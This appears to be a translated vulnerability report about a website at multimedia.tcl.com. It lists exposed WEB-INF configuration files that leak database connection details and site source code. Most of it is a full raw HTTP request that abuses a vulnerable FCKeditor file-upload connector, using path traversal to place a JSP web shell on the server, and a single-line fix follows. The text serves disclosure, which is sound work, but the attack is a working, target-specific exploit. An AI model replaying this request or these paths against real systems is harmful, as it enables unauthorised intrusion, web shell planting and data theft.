If a type of tcl station is improperly configured, getshell can be used to access the Intranet.
Http://multimedia.tcl.com/WEB-INF/web.xml
Web. xml accessible
Follow the steps shown in the figure
Http://multimedia.tcl.com/WEB-INF/classes/applicationContext.xml
Http://multimedia.tcl.com/WEB-INF/classes/hibernate.cfg.xml
Find the database connection in the Intranet
Each classes can be downloaded, which can cause the whole site source code leakage.
The focus is here
Fckeditor
After access, it is found that a vulnerable version can be used across directories.
POST /lokosuite/module/core/htmleditor/editor/filemanager/browser/default/connectors/jsp/connector?Command=FileUpload&Type=Image&CurrentFolder=/../../en/home/ HTTP/1.1Host: multimedia.tcl.comProxy-Connection: keep-aliveContent-Length: 7338Cache-Control: max-age=0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Origin: http://multimedia.tcl.comUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2272.3 Safari/537.36Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryMqgpH9KZNXlFibX4Referer: http://multimedia.tcl.com/lokosuite/module/core/htmleditor/editor/filemanager/browser/default/frmupload.htmlAccept-Encoding: gzip, deflateAccept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4Cookie: JSESSIONID=EC6CB4E9F7907F950BB61462522B06DF; __utmt=1; __utma=168697661.1185858053.1421290181.1421290181.1421290181.1; __utmb=168697661.8.10.1421290181; __utmc=168697661; __utmz=168697661.1421290181.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)------WebKitFormBoundaryMqgpH9KZNXlFibX4Content-Disposition: form-data; name="NewFile"; filename="indexs.jsp"Content-Type: application/octet-stream
This package is directly uploaded to shell
Solution:
Prohibit Access to the configuration file